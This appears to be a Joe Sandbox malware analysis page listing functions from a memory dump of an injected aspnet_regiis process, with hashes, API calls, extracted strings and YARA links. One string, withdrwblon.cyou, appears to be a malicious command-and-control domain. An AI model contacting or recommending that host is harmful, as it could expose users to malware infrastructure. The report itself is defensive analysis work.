Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: Noni$f[zU
API String ID: 0-2312422219
Opcode ID: c76a86252696e8caf809158c376a189ca5946c908488d4d98048e9bd0ff45910
Instruction ID: b04ab8e45c9f1c1cb8d6a34d822dda482df5337e7dcd44b2b3d6cd520c18b183
Opcode Fuzzy Hash: c76a86252696e8caf809158c376a189ca5946c908488d4d98048e9bd0ff45910
Instruction Fuzzy Hash: 92919CB01547008BEB69CF25C6D0B267BB2FF59344F2055ACD9460F6AED776E842CB80

Function 75A966E0 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(75AB79D8,00000000,00000001,75AB79C8), ref: 75A96709

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: f5cd2a443374a3b3c72bc4888455f1c29d10de72e0d9bbef0e69dbf48c022dff
Instruction ID: f175e4e8678764fed725243523d810b34685e2723beec9e38a4776feee6897ef
Opcode Fuzzy Hash: f5cd2a443374a3b3c72bc4888455f1c29d10de72e0d9bbef0e69dbf48c022dff
Instruction Fuzzy Hash: 4451DDB56042509BDB159B24CC92FA737F5FF853A8F048928E9968F298F374D801C765

Function 75A96940 Relevance: 1.7, Strings: 1, Instructions: 480COMMON

Download Yara Rule

Strings

Y!, xrefs: 75A96AF0

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: Y!
API String ID: 0-2222236823
Opcode ID: 27c65da415cf47c06d1ce4667957ef7112ce9505f1bd539298aa2248bae9706a
Instruction ID: 77a6371cebf1a77000ac1016577c7eb916724f0dbf598b2c160eb3f7b90713ec
Opcode Fuzzy Hash: 27c65da415cf47c06d1ce4667957ef7112ce9505f1bd539298aa2248bae9706a
Instruction Fuzzy Hash: 85C15872A082604BD709CB24CC52E6B77F2EF85364F08893DE8D69B395E738D905C796

Function 75A9ECE0 Relevance: 1.7, Strings: 1, Instructions: 422COMMON

Download Yara Rule

Strings

", xrefs: 75A9EFF6

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: d03b1bafc9602a22e811c3fecf8f78b82289774c9149a23143f76dcdf2d4c791
Instruction ID: b675357e6f20331c31fc166a40c65e5c30022f7fb7a0cce2d6db6ba539a02cb8
Opcode Fuzzy Hash: d03b1bafc9602a22e811c3fecf8f78b82289774c9149a23143f76dcdf2d4c791
Instruction Fuzzy Hash: F3D12972B0C3215FD70ACE24C880F5B77EAAB98250F18893DE8978739AE734D94587D5

Function 75A91EC5 Relevance: 1.6, Strings: 1, Instructions: 400COMMON

Download Yara Rule

Strings

_a1c, xrefs: 75A9203B

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: _a1c
API String ID: 0-3923334831
Opcode ID: 11ac2e6f0c56966176832f91523f922e078cc36adf2afcb1a741f4e051b4ba2b
Instruction ID: 35fc9665d29cff0e44d46b43083f7b0ac962c29429915b627753ef4854dd232a
Opcode Fuzzy Hash: 11ac2e6f0c56966176832f91523f922e078cc36adf2afcb1a741f4e051b4ba2b
Instruction Fuzzy Hash: 75C10F755093108BD304CF24C891B5BBBF2FFD5794F148A2CE4D65B2A8E7358942CB8A

Function 75AAFC90 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

InA>, xrefs: 75AAFD10

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>
API String ID: 2994545307-2903657838
Opcode ID: 21a56138b84e7608080ca962d42f2d48969b3d87fcddd5f4dbb340c9666ae3dd
Instruction ID: dd88b90d93089b475fce70ef7c6b83e87e0d923dd5123545e879ef8d2b2a5d8b
Opcode Fuzzy Hash: 21a56138b84e7608080ca962d42f2d48969b3d87fcddd5f4dbb340c9666ae3dd
Instruction Fuzzy Hash: 0E612B3A7483465BD31ADE69C980F2A77E3BBC8314F14853DE9A68729EE73198038751

Function 75AB24E0 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

8977, xrefs: 75AB24E2

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 8977
API String ID: 0-400282742
Opcode ID: 5f4d7ccd7bb518e15080d5c5491b2699e037c1dbdcb6f93886c9cc46b5a188d6
Instruction ID: d7ae7f2db61c68b243d3dc3c99f66e8905b4403c5ad842dd55c8d888b5624f13
Opcode Fuzzy Hash: 5f4d7ccd7bb518e15080d5c5491b2699e037c1dbdcb6f93886c9cc46b5a188d6
Instruction Fuzzy Hash: 59518C327182154BD31599298D51F2E77ABFFC8360F29463DE8A6973D9DB79A80283C0

Function 75A9A083 Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

>ebg, xrefs: 75A9AA95

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: >ebg
API String ID: 0-4222723227
Opcode ID: 8bdc5a6c715ad244ca7393046aa5c4cfd87a5b5834fb4c2a9dcd095bde811acb
Instruction ID: 995db894e49ec8bb3cb721f64b1ccd5d4b3f4dac1d2989bbb2c2ec15394ccd51
Opcode Fuzzy Hash: 8bdc5a6c715ad244ca7393046aa5c4cfd87a5b5834fb4c2a9dcd095bde811acb
Instruction Fuzzy Hash: 74518F3194C3628FD315CB288580A57BBE2EF95250F09867AD9E30B3DDD735C909C39A

Function 75A98290 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

45, xrefs: 75A982EB

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 45
API String ID: 0-2889884971
Opcode ID: bd6917c50ee68ab2669d61550f9dde06e89b9706613a35f9f7ae8e589c37a2ef
Instruction ID: 4484b7deebb41ff5916ccea7d0eea89723c1a7b4dd827467b94e5d1bebbfda7e
Opcode Fuzzy Hash: bd6917c50ee68ab2669d61550f9dde06e89b9706613a35f9f7ae8e589c37a2ef
Instruction Fuzzy Hash: C0416972A48344DBE3208E299C45FDFB7A8EB85305F10487DF6489B251CB7598058B95

Function 75A714AD Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 75A714B2

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 0123456789abcdefxp
API String ID: 0-3219943381
Opcode ID: 86ee0d9176365d436625457d0e50641d83f7b3527fc2d736cab7ceeebd5193a6
Instruction ID: a70bace522d5790b1f47aa4410b0f16d430ac88bfdfca2611f8981a79dfc0b3e
Opcode Fuzzy Hash: 86ee0d9176365d436625457d0e50641d83f7b3527fc2d736cab7ceeebd5193a6
Instruction Fuzzy Hash: 91518E70A0C3818BD706CE14C090B5EBBE2AFD9354F508E7DE8E657799D77588888BC2

Function 75A7E8FF Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

withdrwblon.cyou, xrefs: 75A7E90E

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: withdrwblon.cyou
API String ID: 0-2957861632
Opcode ID: 6f44d5f3e2338d875e44439fd40e9fcbdb9de754f5d3fe6b6c2ff89f918b969f
Instruction ID: 310c661c59ff6d21e918f379114901696f43a096281f05dc60c0ab5f9ccb986d
Opcode Fuzzy Hash: 6f44d5f3e2338d875e44439fd40e9fcbdb9de754f5d3fe6b6c2ff89f918b969f
Instruction Fuzzy Hash: 84E04F75418301CACB408F15D121A76B3F9FF4A246F006868E4869B624F3789505D765

Function 75AB35F0 Relevance: .9, Instructions: 896COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f43b1b413f885aff141c30c23837aa54c68606f3bdff9ce06771c1469950c6f
Instruction ID: 8339a2f62758e00030c7209ae6712e13cef33417267ec890aa17c1cf473a87c6
Opcode Fuzzy Hash: 8f43b1b413f885aff141c30c23837aa54c68606f3bdff9ce06771c1469950c6f
Instruction Fuzzy Hash: 4252FF32A18251CFCB08CF29D4A066EB7F2FB8D314F19847EE59697391D7399902CB81

Function 75A7BD50 Relevance: .8, Instructions: 822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a4d3d8cc7f68a48846ecc7f730dec6161025808fc5088cf9dc8c50174c56ec
Instruction ID: 839f8ca7e01df1c40b0139499e76f31f5079928bd639106aa4b12e80bd110998
Opcode Fuzzy Hash: f4a4d3d8cc7f68a48846ecc7f730dec6161025808fc5088cf9dc8c50174c56ec
Instruction Fuzzy Hash: 2952E3316083158BC315DF18E990AAAB3F2FFC4324F158D3DD99697289E738E951CB82

Function 75AB3740 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c9fedf1b5ac4ba958e1cf5f2eafa01d5e27ce9659cda8fdb2cbb8e633914e1
Instruction ID: fdac002055f2407340de4df507ae8b40c09721042245364852d4a2df95ee315e
Opcode Fuzzy Hash: 58c9fedf1b5ac4ba958e1cf5f2eafa01d5e27ce9659cda8fdb2cbb8e633914e1
Instruction Fuzzy Hash: C232F132A18251CFCB08CF69D4A076EB7F2FB89314F19847DE98A97351D7799902CB81

Function 75AB378A Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f30e802254785b1e33b8934c2a25506eb717565b4652800571f5bc7ad3ae28
Instruction ID: 40006188a67e6d31b9539cb85d4a630db14159039b5377c7e2a1ccb56f36f233
Opcode Fuzzy Hash: 01f30e802254785b1e33b8934c2a25506eb717565b4652800571f5bc7ad3ae28
Instruction Fuzzy Hash: FD320032A18251CFCB08CF69D4A076EB7F2FB89314F19847DE58A97351DB799902CB81

Function 75AB39C0 Relevance: .6, Instructions: 616COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e664fafae43324b55f4dbf933c6332c70774cd14b94cdc881dfcd080a1299770
Instruction ID: 9ec99b15d12ce09afd6ce330cb0eb131c0ef59989fdeaf3403cf5e5bbb72628d
Opcode Fuzzy Hash: e664fafae43324b55f4dbf933c6332c70774cd14b94cdc881dfcd080a1299770
Instruction Fuzzy Hash: 8B12EF32A18251CFCB08CF79D4A066EB7F2FB89314F19887DE58A97351D775A902CB81

Function 75AB3A90 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd2150f642266df3d8cff4e97f98a02be779507b275a90460354dffc4f7ce51f
Instruction ID: 325263ef7b5646af60f6d656c05f0492b180596ce2f3f79fa74ce76b4d683ed2
Opcode Fuzzy Hash: cd2150f642266df3d8cff4e97f98a02be779507b275a90460354dffc4f7ce51f
Instruction Fuzzy Hash: A502DF32A18251CFCB08CF79D4A066EBBF2FB89314F19887DE49A97751D7749902CB81

Function 75A9C3A6 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f726a4e80285c1e4c723c9531e1eb375d134f30f0573eaa12dab378eccf52714
Instruction ID: ed87ff90974680ee1b4892a99f0552857c237385370633914a0e87cb387abe61
Opcode Fuzzy Hash: f726a4e80285c1e4c723c9531e1eb375d134f30f0573eaa12dab378eccf52714
Instruction Fuzzy Hash: 2BF1C275E14256CFDB08CF69C8A0BADBBF2BF89310F2881B9D451A7395D7349942CB90

Function 75AB3D90 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82415190bea056839209a1bec3fdb8f34adeded6bddcce141cfdfc84d19233d6
Instruction ID: eb803fcb962d3cdd943fdb473001f8950de8a3ad81dcce3721b8b319c5815245
Opcode Fuzzy Hash: 82415190bea056839209a1bec3fdb8f34adeded6bddcce141cfdfc84d19233d6
Instruction Fuzzy Hash: C3C1CD32E18255CFCB08CF79C8907AEBBF2BB89314F19847DE586A7341D73499028B91

Function 75AB5330 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5ccd14a037a442b2917a62d011d67fb2157fa3ad796ae21811c8d5c82ca7252
Instruction ID: 40175362bf55b58f2de276c70c1a4b098d93730f18c1b9cd767115beeeb793d6
Opcode Fuzzy Hash: c5ccd14a037a442b2917a62d011d67fb2157fa3ad796ae21811c8d5c82ca7252
Instruction Fuzzy Hash: 67A1F2356083118BCB15CE28C490A2EB7F6BF8D750F14893CEA9687358E7B5EC51CB82

Function 75A78EF0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73cde91c4522803a9a364839f3881cb56dd478fd4698d3006a8f67b8e163896a
Instruction ID: 9a22902801fb36e69ed74ffb93f633d0a484b5f244de7229311ad74499d949c7
Opcode Fuzzy Hash: 73cde91c4522803a9a364839f3881cb56dd478fd4698d3006a8f67b8e163896a
Instruction Fuzzy Hash: 2E715876618302CFD708CF16C090B9E7BE2FB8A745F25867CE84947291CB75D986CB81

Function 75A75890 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c80702835bda9c8dfb266e6c9737cb9668ea76aef08034962c753775b579e3
Instruction ID: 964986547f8df50de5014fd9cfc3b202b35d5b1319177de52841b5fe8df76675
Opcode Fuzzy Hash: 80c80702835bda9c8dfb266e6c9737cb9668ea76aef08034962c753775b579e3
Instruction Fuzzy Hash: F3518175A046019FCB05DF28D880D16B7E2FF8D264F154A7CE8AA8B395DB31EC42CB91

Function 75A74BA0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ef648ecb7f36853852f90495c79ae6ae6648ee382ce5fca975ef8a335ce8f0
Instruction ID: 2c8029a2c212d404e3b192908eaecf0060ae67a0773872cc382134d8210a1442
Opcode Fuzzy Hash: 40ef648ecb7f36853852f90495c79ae6ae6648ee382ce5fca975ef8a335ce8f0
Instruction Fuzzy Hash: 50412C63F1472507E7454A34DCA0FAAB753EB852A0F09077EE9F74B3DBD7284A4482A1

Function 75A936AC Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a7d9d001bf305edc0d7b3ba647f1f32b8636270775185947a591f84b15bab1
Instruction ID: 02499b498e2daa142bbfdca1f9e3184bd15c95822f557fafbb161ec3df69ee4d
Opcode Fuzzy Hash: 69a7d9d001bf305edc0d7b3ba647f1f32b8636270775185947a591f84b15bab1
